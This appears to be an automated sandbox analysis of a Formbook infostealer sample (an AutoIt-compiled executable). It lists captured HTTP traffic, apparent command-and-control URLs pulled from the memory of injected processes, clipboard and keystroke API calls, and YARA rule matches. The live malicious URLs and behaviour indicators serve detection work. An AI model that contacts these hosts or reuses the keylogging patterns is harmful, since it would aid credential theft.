0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 12:09:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 12:09:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 12:09:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4125575598.0000000008328000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.0araba.net
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4125575598.0000000008328000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.0araba.net/s5jh/
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007096000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006716000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007096000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006716000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007096000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006716000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
Source: PresentationHost.exe, 00000006.00000002.4122364070.00000000060CE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://coinwab.com/index.php/efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt
Source: PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://dhosting.pl
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006D72000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://dhosting.pl/bledyhttp/domeny.html
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006D72000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://dhosting.pl/bledyhttp/hosting.html
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006D72000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://dhosting.pl/img/logo.svg
Source: PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://dhosting.pl/kontakt
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033m
Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.washio.world&rand=
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://reg.ru
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://track.uc.cn/collect
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006406000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000005A86000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.0000000016EA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.kosherphonestore.com/y0az/?wd98XJp=1StTTN5BD
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_ser
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_ne
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_host&
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_cms
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.washio.world&utm_medium=parking&utm_cam
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.washio.world&amp;reg_source=parking_auto
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000672A000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000005DAA000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.threendresses.com/ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0067425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_0067425A
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00674458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00674458
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0067425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_0067425A
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00660219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_00660219
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0068CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0068CDAC

E-Banking Fraud

barindex
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4121800336.0000000004A74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: This is a third-party compiled AutoIt script. 0_2_00603B4C
Source: nJ8mJTmMf0.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: nJ8mJTmMf0.exe, 00000000.00000000.1651855029.00000000006B5000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_26fbddc7-f
Source: nJ8mJTmMf0.exe, 00000000.00000000.1651855029.00000000006B5000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_eaed8490-7
